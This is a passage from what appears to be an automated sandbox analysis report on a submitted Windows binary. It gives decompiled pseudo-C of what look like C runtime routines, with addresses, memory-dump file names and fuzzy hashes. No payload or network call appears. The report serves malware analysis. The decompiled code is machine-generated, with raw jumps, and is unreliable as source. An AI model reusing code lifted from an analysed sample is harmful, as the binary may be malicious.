                                                                                                                                                                                                                                                        				r15d = _t22 + 0xc + r13d;
                                                                                                                                                                                                                                                        				0xe5ac4094(_t98, _t96, _t93, _t72);
                                                                                                                                                                                                                                                        				if (_t55 != 0) goto 0xe5ac70eb;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0, _t58, _t71, 0xe5ae1890);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t55, _t96);
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}
















                                                                                                                                                                                                                                                        0x7ff6e5ac6f98
                                                                                                                                                                                                                                                        0x7ff6e5ac6f98
                                                                                                                                                                                                                                                        0x7ff6e5ac6f9b
                                                                                                                                                                                                                                                        0x7ff6e5ac6f9f
                                                                                                                                                                                                                                                        0x7ff6e5ac6fa3
                                                                                                                                                                                                                                                        0x7ff6e5ac6fb4
                                                                                                                                                                                                                                                        0x7ff6e5ac6fc1
                                                                                                                                                                                                                                                        0x7ff6e5ac6fc6
                                                                                                                                                                                                                                                        0x7ff6e5ac6fce
                                                                                                                                                                                                                                                        0x7ff6e5ac6fd5
                                                                                                                                                                                                                                                        0x7ff6e5ac6fda
                                                                                                                                                                                                                                                        0x7ff6e5ac6fe3
                                                                                                                                                                                                                                                        0x7ff6e5ac6fed
                                                                                                                                                                                                                                                        0x7ff6e5ac6ffb
                                                                                                                                                                                                                                                        0x7ff6e5ac7003
                                                                                                                                                                                                                                                        0x7ff6e5ac7006
                                                                                                                                                                                                                                                        0x7ff6e5ac700b
                                                                                                                                                                                                                                                        0x7ff6e5ac7016
                                                                                                                                                                                                                                                        0x7ff6e5ac7024
                                                                                                                                                                                                                                                        0x7ff6e5ac7028
                                                                                                                                                                                                                                                        0x7ff6e5ac7030
                                                                                                                                                                                                                                                        0x7ff6e5ac7035
                                                                                                                                                                                                                                                        0x7ff6e5ac703d
                                                                                                                                                                                                                                                        0x7ff6e5ac704b
                                                                                                                                                                                                                                                        0x7ff6e5ac7050
                                                                                                                                                                                                                                                        0x7ff6e5ac7065
                                                                                                                                                                                                                                                        0x7ff6e5ac7074
                                                                                                                                                                                                                                                        0x7ff6e5ac7079
                                                                                                                                                                                                                                                        0x7ff6e5ac7080
                                                                                                                                                                                                                                                        0x7ff6e5ac708d
                                                                                                                                                                                                                                                        0x7ff6e5ac708f
                                                                                                                                                                                                                                                        0x7ff6e5ac7097
                                                                                                                                                                                                                                                        0x7ff6e5ac709f
                                                                                                                                                                                                                                                        0x7ff6e5ac70ad
                                                                                                                                                                                                                                                        0x7ff6e5ac70b0
                                                                                                                                                                                                                                                        0x7ff6e5ac70bb
                                                                                                                                                                                                                                                        0x7ff6e5ac70bf
                                                                                                                                                                                                                                                        0x7ff6e5ac70c7
                                                                                                                                                                                                                                                        0x7ff6e5ac70ea

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: TMP
                                                                                                                                                                                                                                                        • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                        • Opcode ID: 8da879ce843490744e8a9a913aa2afef3feda5b6b42bb99b1e0ec2f3f00b5d33
                                                                                                                                                                                                                                                        • Instruction ID: 93dadb095982e9e95ea6d03743188ee4322b5ef3c557bdf8814b76d7dd6722f6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8da879ce843490744e8a9a913aa2afef3feda5b6b42bb99b1e0ec2f3f00b5d33
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF516E13B0864241FB64AA2E59217BE52D1AF95FC4F484438DE0ECB796EF3EEC41434A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD25A0(long long __rax) {
                                                                                                                                                                                                                                                        				signed int _t3;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t3 = GetProcessHeap();
                                                                                                                                                                                                                                                        				 *0xe5afd270 = __rax;
                                                                                                                                                                                                                                                        				return _t3 & 0xffffff00 | __rax != 0x00000000;
                                                                                                                                                                                                                                                        			}




                                                                                                                                                                                                                                                        0x7ff6e5ad25a4
                                                                                                                                                                                                                                                        0x7ff6e5ad25ad
                                                                                                                                                                                                                                                        0x7ff6e5ad25bb

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                        • Opcode ID: 6aaf01db4fcd6d8e5e92a2165bcca8bef3bc9097c29bcaeff3790f5a52787e5b
                                                                                                                                                                                                                                                        • Instruction ID: 187eaf9e1e6972fa7e1f67adf1c6649758802083c7acc477eaf448432fbe72b3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6aaf01db4fcd6d8e5e92a2165bcca8bef3bc9097c29bcaeff3790f5a52787e5b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51B09271F07A02D2EA092B296C9231823A47F48B40FA80038C40CC0320DF3D28AA6B16
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 56%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC2800(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long _a16, long long _a24, long long _a32) {
                                                                                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                                                                                                        				char _v68;
                                                                                                                                                                                                                                                        				char _v70;
                                                                                                                                                                                                                                                        				signed int _v72;
                                                                                                                                                                                                                                                        				long long _v88;
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                                                                                        				void* _t112;
                                                                                                                                                                                                                                                        				void* _t140;
                                                                                                                                                                                                                                                        				char _t147;
                                                                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                                                                        				unsigned int _t156;
                                                                                                                                                                                                                                                        				signed char _t157;
                                                                                                                                                                                                                                                        				signed int _t160;
                                                                                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                                                                                        				void* _t178;
                                                                                                                                                                                                                                                        				void* _t179;
                                                                                                                                                                                                                                                        				void* _t185;
                                                                                                                                                                                                                                                        				signed long long _t231;
                                                                                                                                                                                                                                                        				void* _t247;
                                                                                                                                                                                                                                                        				intOrPtr _t258;
                                                                                                                                                                                                                                                        				intOrPtr _t261;
                                                                                                                                                                                                                                                        				intOrPtr* _t265;
                                                                                                                                                                                                                                                        				void* _t270;
                                                                                                                                                                                                                                                        				intOrPtr _t276;
                                                                                                                                                                                                                                                        				signed int* _t278;
                                                                                                                                                                                                                                                        				void* _t282;
                                                                                                                                                                                                                                                        				void* _t283;
                                                                                                                                                                                                                                                        				void* _t286;
                                                                                                                                                                                                                                                        				void* _t293;
                                                                                                                                                                                                                                                        				intOrPtr* _t294;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t286 = __r8;
                                                                                                                                                                                                                                                        				_t280 = __rsi;
                                                                                                                                                                                                                                                        				_t277 = __rdi;
                                                                                                                                                                                                                                                        				_a16 = __rbx;
                                                                                                                                                                                                                                                        				_a24 = __rsi;
                                                                                                                                                                                                                                                        				_a32 = __rdi;
                                                                                                                                                                                                                                                        				_t282 = _t283;
                                                                                                                                                                                                                                                        				_t284 = _t283 - 0x50;
                                                                                                                                                                                                                                                        				_t231 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_v56 = _t231 ^ _t283 - 0x00000050;
                                                                                                                                                                                                                                                        				_t247 = __rcx;
                                                                                                                                                                                                                                                        				_t147 =  *((char*)(__rcx + 0x39));
                                                                                                                                                                                                                                                        				_t6 = _t277 - 0x77; // 0x1
                                                                                                                                                                                                                                                        				r13d = _t6;
                                                                                                                                                                                                                                                        				_t178 = _t147 - 0x64;
                                                                                                                                                                                                                                                        				if (_t178 > 0) goto 0xe5ac28b5;
                                                                                                                                                                                                                                                        				if (_t178 == 0) goto 0xe5ac28df;
                                                                                                                                                                                                                                                        				_t179 = _t147 - 0x53;
                                                                                                                                                                                                                                                        				if (_t179 > 0) goto 0xe5ac287d;
                                                                                                                                                                                                                                                        				if (_t179 == 0) goto 0xe5ac2926;
                                                                                                                                                                                                                                                        				if (_t179 == 0) goto 0xe5ac2870;
                                                                                                                                                                                                                                                        				if (_t179 == 0) goto 0xe5ac2899;
                                                                                                                                                                                                                                                        				if (_t179 == 0) goto 0xe5ac2870;
                                                                                                                                                                                                                                                        				_t151 = _t147 - 0x3d - r13d;
                                                                                                                                                                                                                                                        				if (_t179 == 0) goto 0xe5ac2870;
                                                                                                                                                                                                                                                        				if (_t151 != r13d) goto 0xe5ac294d;
                                                                                                                                                                                                                                                        				_t111 = E00007FF67FF6E5AC3164(0x78, __rcx, __rcx, __rsi, _t282);
                                                                                                                                                                                                                                                        				goto 0xe5ac2949;
                                                                                                                                                                                                                                                        				if (_t151 == 0x58) goto 0xe5ac293e;
                                                                                                                                                                                                                                                        				if (_t151 == 0x5a) goto 0xe5ac28a8;
                                                                                                                                                                                                                                                        				if (_t151 == 0x61) goto 0xe5ac2870;
                                                                                                                                                                                                                                                        				if (_t151 != 0x63) goto 0xe5ac294d;
                                                                                                                                                                                                                                                        				_t112 = E00007FF67FF6E5AC3620(_t111, _t151 - 0x63, __rcx, __rcx);
                                                                                                                                                                                                                                                        				goto 0xe5ac2949;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3068(_t112, __rcx);
                                                                                                                                                                                                                                                        				goto 0xe5ac2949;
                                                                                                                                                                                                                                                        				_t185 = _t151 - 0x6f;
                                                                                                                                                                                                                                                        				if (_t185 > 0) goto 0xe5ac290f;
                                                                                                                                                                                                                                                        				if (_t185 == 0) goto 0xe5ac28ef;
                                                                                                                                                                                                                                                        				if (_t185 == 0) goto 0xe5ac2870;
                                                                                                                                                                                                                                                        				if (_t185 == 0) goto 0xe5ac2870;
                                                                                                                                                                                                                                                        				if (_t185 == 0) goto 0xe5ac2870;
                                                                                                                                                                                                                                                        				if (_t185 == 0) goto 0xe5ac28df;
                                                                                                                                                                                                                                                        				if (_t151 - 0x65 - r13d - r13d - 2 != 5) goto 0xe5ac294d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC37B8(__rcx, __rcx);
                                                                                                                                                                                                                                                        				goto 0xe5ac2949;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC0DB0(0, __rcx, __rcx, __rdi, _t280, _t282);
                                                                                                                                                                                                                                                        				goto 0xe5ac2949;
                                                                                                                                                                                                                                                        				_t156 =  *(__rcx + 0x28);
                                                                                                                                                                                                                                                        				if ((r13b & _t156 >> 0x00000005) == 0) goto 0xe5ac2903;
                                                                                                                                                                                                                                                        				asm("bts ecx, 0x7");
                                                                                                                                                                                                                                                        				 *(__rcx + 0x28) = _t156;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC09A0(0, __rcx, __rcx, _t277, _t280, _t282);
                                                                                                                                                                                                                                                        				goto 0xe5ac2949;
                                                                                                                                                                                                                                                        				if (_t156 == 0x70) goto 0xe5ac2930;
                                                                                                                                                                                                                                                        				if (_t156 == 0x73) goto 0xe5ac2926;
                                                                                                                                                                                                                                                        				if (_t156 == 0x75) goto 0xe5ac28e3;
                                                                                                                                                                                                                                                        				if (_t156 != 0x78) goto 0xe5ac294d;
                                                                                                                                                                                                                                                        				goto 0xe5ac2941;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3870(__rcx);
                                                                                                                                                                                                                                                        				goto 0xe5ac2949;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AC11C0(r13b, __rcx, __rcx, _t277, _t280, _t282) != 0) goto 0xe5ac2954;
                                                                                                                                                                                                                                                        				goto 0xe5ac2bd7;
                                                                                                                                                                                                                                                        				if ( *((char*)(__rcx + 0x38)) != 0) goto 0xe5ac2bd4;
                                                                                                                                                                                                                                                        				_t157 =  *(__rcx + 0x28);
                                                                                                                                                                                                                                                        				_v72 = 0;
                                                                                                                                                                                                                                                        				_v70 = 0;
                                                                                                                                                                                                                                                        				if ((r13b & 0) == 0) goto 0xe5ac29a1;
                                                                                                                                                                                                                                                        				if ((r13b & 0) == 0) goto 0xe5ac2986;
                                                                                                                                                                                                                                                        				_v72 = 0x2d;
                                                                                                                                                                                                                                                        				goto 0xe5ac299e;
                                                                                                                                                                                                                                                        				if ((r13b & _t157) == 0) goto 0xe5ac2991;
                                                                                                                                                                                                                                                        				_v72 = 0x2b;
                                                                                                                                                                                                                                                        				goto 0xe5ac299e;
                                                                                                                                                                                                                                                        				if ((r13b & 0) == 0) goto 0xe5ac29a1;
                                                                                                                                                                                                                                                        				_v72 = 0x20;
                                                                                                                                                                                                                                                        				_t270 = _t293;
                                                                                                                                                                                                                                                        				r8b =  *((intOrPtr*)(__rcx + 0x39));
                                                                                                                                                                                                                                                        				if (0 != 0) goto 0xe5ac29bc;
                                                                                                                                                                                                                                                        				if ((r13b & 0) == 0) goto 0xe5ac29bc;
                                                                                                                                                                                                                                                        				r9b = r13b;
                                                                                                                                                                                                                                                        				goto 0xe5ac29bf;
                                                                                                                                                                                                                                                        				r9b = 0;
                                                                                                                                                                                                                                                        				if (r9b != 0) goto 0xe5ac29d1;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac29ee;
                                                                                                                                                                                                                                                        				 *((char*)(_t282 + _t270 - 0x20)) = 0x30;
                                                                                                                                                                                                                                                        				if (r8b == 0x58) goto 0xe5ac29e2;
                                                                                                                                                                                                                                                        				if (r8b != 0x41) goto 0xe5ac29e5;
                                                                                                                                                                                                                                                        				dil = 0x58;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t282 + _t270 - 0x1f)) = dil;
                                                                                                                                                                                                                                                        				_t177 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
                                                                                                                                                                                                                                                        				if ((_t157 & 0x0000000c) != 0) goto 0xe5ac2a60;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				if (_t177 <= 0) goto 0xe5ac2a60;
                                                                                                                                                                                                                                                        				r8d =  *(__rcx + 0x20);
                                                                                                                                                                                                                                                        				_t258 =  *((intOrPtr*)(__rcx + 0x460));
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t258 + 0x10)) !=  *((intOrPtr*)(_t258 + 8))) goto 0xe5ac2a2c;
                                                                                                                                                                                                                                                        				if ( *((char*)(_t258 + 0x18)) == 0) goto 0xe5ac2a22;
                                                                                                                                                                                                                                                        				r8d = r8d + 1;
                                                                                                                                                                                                                                                        				goto 0xe5ac2a26;
                                                                                                                                                                                                                                                        				r8d = r8d | 0xffffffff;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x20) = r8d;
                                                                                                                                                                                                                                                        				goto 0xe5ac2a4e;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x20) = _t286 + 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t258 + 0x10)) =  *((intOrPtr*)(_t258 + 0x10)) + _t293;
                                                                                                                                                                                                                                                        				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t293;
                                                                                                                                                                                                                                                        				r8d =  *(__rcx + 0x20);
                                                                                                                                                                                                                                                        				if (r8d == 0xffffffff) goto 0xe5ac2a60;
                                                                                                                                                                                                                                                        				r9d = r9d + r13d;
                                                                                                                                                                                                                                                        				if (r9d - _t177 < 0) goto 0xe5ac2a06;
                                                                                                                                                                                                                                                        				_t63 = _t247 + 0x20; // 0x78
                                                                                                                                                                                                                                                        				_t278 = _t63;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                                                                                                                                                                                                        				_t65 = _t247 + 0x460; // 0x4b8
                                                                                                                                                                                                                                                        				_t294 = _t65;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3A98(_t286 + 1, 0x78, _t177, __rcx, _t294, _t278, _t280, _t282, _t278);
                                                                                                                                                                                                                                                        				if ((r13b & 0) == 0) goto 0xe5ac2ae9;
                                                                                                                                                                                                                                                        				if ((r13b &  *(__rcx + 0x28) >> 0x00000002) != 0) goto 0xe5ac2ae9;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				if (_t177 <= 0) goto 0xe5ac2ae9;
                                                                                                                                                                                                                                                        				_t261 =  *_t294;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t261 + 0x10)) !=  *((intOrPtr*)(_t261 + 8))) goto 0xe5ac2ac2;
                                                                                                                                                                                                                                                        				if ( *((char*)(_t261 + 0x18)) == 0) goto 0xe5ac2abb;
                                                                                                                                                                                                                                                        				goto 0xe5ac2abe;
                                                                                                                                                                                                                                                        				 *_t278 =  *_t278 + 0x00000001 | 0xffffffff;
                                                                                                                                                                                                                                                        				goto 0xe5ac2ada;
                                                                                                                                                                                                                                                        				 *_t278 =  &(( &_v72)[0]);
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t261 + 0x10)) =  *((intOrPtr*)(_t261 + 0x10)) + _t293;
                                                                                                                                                                                                                                                        				 *((char*)( *((intOrPtr*)( *_t294)))) = 0x30;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)( *_t294)) =  *((intOrPtr*)( *_t294)) + _t293;
                                                                                                                                                                                                                                                        				if ( *_t278 == 0xffffffff) goto 0xe5ac2ae9;
                                                                                                                                                                                                                                                        				r8d = r8d + r13d;
                                                                                                                                                                                                                                                        				if (r8d - _t177 < 0) goto 0xe5ac2aa4;
                                                                                                                                                                                                                                                        				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0xe5ac2b5b;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0xe5ac2b5b;
                                                                                                                                                                                                                                                        				r15d = 0;
                                                                                                                                                                                                                                                        				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                                                                                                                                                                                                        				_v72 = _v72 & 0x00000000;
                                                                                                                                                                                                                                                        				r8d = 6;
                                                                                                                                                                                                                                                        				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ACDA00( *((intOrPtr*)(__rcx + 8)), __rcx,  &_v72,  &_v68, _t282, _t286) != 0) goto 0xe5ac2b56;
                                                                                                                                                                                                                                                        				r8d = _v72;
                                                                                                                                                                                                                                                        				if (r8d == 0) goto 0xe5ac2b56;
                                                                                                                                                                                                                                                        				_v88 =  *((intOrPtr*)(_t247 + 8));
                                                                                                                                                                                                                                                        				_t140 = E00007FF67FF6E5AC3A98(_t139, 0x78, _t177, _t247, _t294, _t278, _t280, _t282, _t278);
                                                                                                                                                                                                                                                        				r15d = r15d + r13d;
                                                                                                                                                                                                                                                        				if (r15d !=  *(_t247 + 0x48)) goto 0xe5ac2afc;
                                                                                                                                                                                                                                                        				goto 0xe5ac2b77;
                                                                                                                                                                                                                                                        				 *_t278 =  *_t278 | 0xffffffff;
                                                                                                                                                                                                                                                        				goto 0xe5ac2b77;
                                                                                                                                                                                                                                                        				r8d =  *(_t247 + 0x48);
                                                                                                                                                                                                                                                        				_t265 = _t294;
                                                                                                                                                                                                                                                        				_v88 =  *((intOrPtr*)(_t247 + 8));
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3A98(_t140, 0x78, _t177, _t247, _t265, _t278, _t280, _t282, _t278);
                                                                                                                                                                                                                                                        				_t160 =  *_t278;
                                                                                                                                                                                                                                                        				if (_t160 < 0) goto 0xe5ac2bd4;
                                                                                                                                                                                                                                                        				if ((r13b & 0) == 0) goto 0xe5ac2bd4;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				if (_t177 <= 0) goto 0xe5ac2bd4;
                                                                                                                                                                                                                                                        				_t276 =  *_t294;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t276 + 0x10)) !=  *((intOrPtr*)(_t276 + 8))) goto 0xe5ac2bad;
                                                                                                                                                                                                                                                        				if ( *((char*)(_t276 + 0x18)) == 0) goto 0xe5ac2ba6;
                                                                                                                                                                                                                                                        				goto 0xe5ac2ba9;
                                                                                                                                                                                                                                                        				 *_t278 = _t160 + 0x00000001 | 0xffffffff;
                                                                                                                                                                                                                                                        				goto 0xe5ac2bc5;
                                                                                                                                                                                                                                                        				 *_t278 = _t265 + 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t276 + 0x10)) =  *((intOrPtr*)(_t276 + 0x10)) + _t293;
                                                                                                                                                                                                                                                        				 *((char*)( *((intOrPtr*)( *_t294)))) = 0x20;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)( *_t294)) =  *((intOrPtr*)( *_t294)) + _t293;
                                                                                                                                                                                                                                                        				if ( *_t278 == 0xffffffff) goto 0xe5ac2bd4;
                                                                                                                                                                                                                                                        				r8d = r8d + r13d;
                                                                                                                                                                                                                                                        				if (r8d - _t177 < 0) goto 0xe5ac2b8f;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(r13b,  *_t278, _v56 ^ _t284);
                                                                                                                                                                                                                                                        			}



































                                                                                                                                                                                                                                                        0x7ff6e5ac2800
                                                                                                                                                                                                                                                        0x7ff6e5ac2800
                                                                                                                                                                                                                                                        0x7ff6e5ac2800
                                                                                                                                                                                                                                                        0x7ff6e5ac2800
                                                                                                                                                                                                                                                        0x7ff6e5ac2805
                                                                                                                                                                                                                                                        0x7ff6e5ac280a
                                                                                                                                                                                                                                                        0x7ff6e5ac2818
                                                                                                                                                                                                                                                        0x7ff6e5ac281b
                                                                                                                                                                                                                                                        0x7ff6e5ac281f
                                                                                                                                                                                                                                                        0x7ff6e5ac2829
                                                                                                                                                                                                                                                        0x7ff6e5ac2832
                                                                                                                                                                                                                                                        0x7ff6e5ac2835
                                                                                                                                                                                                                                                        0x7ff6e5ac2839
                                                                                                                                                                                                                                                        0x7ff6e5ac2839
                                                                                                                                                                                                                                                        0x7ff6e5ac283d
                                                                                                                                                                                                                                                        0x7ff6e5ac2840
                                                                                                                                                                                                                                                        0x7ff6e5ac2842
                                                                                                                                                                                                                                                        0x7ff6e5ac2848
                                                                                                                                                                                                                                                        0x7ff6e5ac284b
                                                                                                                                                                                                                                                        0x7ff6e5ac284d
                                                                                                                                                                                                                                                        0x7ff6e5ac2856
                                                                                                                                                                                                                                                        0x7ff6e5ac285b
                                                                                                                                                                                                                                                        0x7ff6e5ac2860
                                                                                                                                                                                                                                                        0x7ff6e5ac2862
                                                                                                                                                                                                                                                        0x7ff6e5ac2865
                                                                                                                                                                                                                                                        0x7ff6e5ac286a
                                                                                                                                                                                                                                                        0x7ff6e5ac2873
                                                                                                                                                                                                                                                        0x7ff6e5ac2878
                                                                                                                                                                                                                                                        0x7ff6e5ac2880
                                                                                                                                                                                                                                                        0x7ff6e5ac2889
                                                                                                                                                                                                                                                        0x7ff6e5ac288e
                                                                                                                                                                                                                                                        0x7ff6e5ac2893
                                                                                                                                                                                                                                                        0x7ff6e5ac289e
                                                                                                                                                                                                                                                        0x7ff6e5ac28a3
                                                                                                                                                                                                                                                        0x7ff6e5ac28ab
                                                                                                                                                                                                                                                        0x7ff6e5ac28b0
                                                                                                                                                                                                                                                        0x7ff6e5ac28b5
                                                                                                                                                                                                                                                        0x7ff6e5ac28b8
                                                                                                                                                                                                                                                        0x7ff6e5ac28ba
                                                                                                                                                                                                                                                        0x7ff6e5ac28bf
                                                                                                                                                                                                                                                        0x7ff6e5ac28c4
                                                                                                                                                                                                                                                        0x7ff6e5ac28c9
                                                                                                                                                                                                                                                        0x7ff6e5ac28ce
                                                                                                                                                                                                                                                        0x7ff6e5ac28d3
                                                                                                                                                                                                                                                        0x7ff6e5ac28d8
                                                                                                                                                                                                                                                        0x7ff6e5ac28dd
                                                                                                                                                                                                                                                        0x7ff6e5ac28df
                                                                                                                                                                                                                                                        0x7ff6e5ac28e8
                                                                                                                                                                                                                                                        0x7ff6e5ac28ed
                                                                                                                                                                                                                                                        0x7ff6e5ac28ef
                                                                                                                                                                                                                                                        0x7ff6e5ac28fa
                                                                                                                                                                                                                                                        0x7ff6e5ac28fc
                                                                                                                                                                                                                                                        0x7ff6e5ac2900
                                                                                                                                                                                                                                                        0x7ff6e5ac2908
                                                                                                                                                                                                                                                        0x7ff6e5ac290d
                                                                                                                                                                                                                                                        0x7ff6e5ac2912
                                                                                                                                                                                                                                                        0x7ff6e5ac2917
                                                                                                                                                                                                                                                        0x7ff6e5ac291c
                                                                                                                                                                                                                                                        0x7ff6e5ac2920
                                                                                                                                                                                                                                                        0x7ff6e5ac2924
                                                                                                                                                                                                                                                        0x7ff6e5ac2929
                                                                                                                                                                                                                                                        0x7ff6e5ac292e
                                                                                                                                                                                                                                                        0x7ff6e5ac2930
                                                                                                                                                                                                                                                        0x7ff6e5ac2937
                                                                                                                                                                                                                                                        0x7ff6e5ac294b
                                                                                                                                                                                                                                                        0x7ff6e5ac294f
                                                                                                                                                                                                                                                        0x7ff6e5ac2958
                                                                                                                                                                                                                                                        0x7ff6e5ac295e
                                                                                                                                                                                                                                                        0x7ff6e5ac2963
                                                                                                                                                                                                                                                        0x7ff6e5ac2969
                                                                                                                                                                                                                                                        0x7ff6e5ac2974
                                                                                                                                                                                                                                                        0x7ff6e5ac297e
                                                                                                                                                                                                                                                        0x7ff6e5ac2980
                                                                                                                                                                                                                                                        0x7ff6e5ac2984
                                                                                                                                                                                                                                                        0x7ff6e5ac2989
                                                                                                                                                                                                                                                        0x7ff6e5ac298b
                                                                                                                                                                                                                                                        0x7ff6e5ac298f
                                                                                                                                                                                                                                                        0x7ff6e5ac2998
                                                                                                                                                                                                                                                        0x7ff6e5ac299a
                                                                                                                                                                                                                                                        0x7ff6e5ac299e
                                                                                                                                                                                                                                                        0x7ff6e5ac29a1
                                                                                                                                                                                                                                                        0x7ff6e5ac29ab
                                                                                                                                                                                                                                                        0x7ff6e5ac29b5
                                                                                                                                                                                                                                                        0x7ff6e5ac29b7
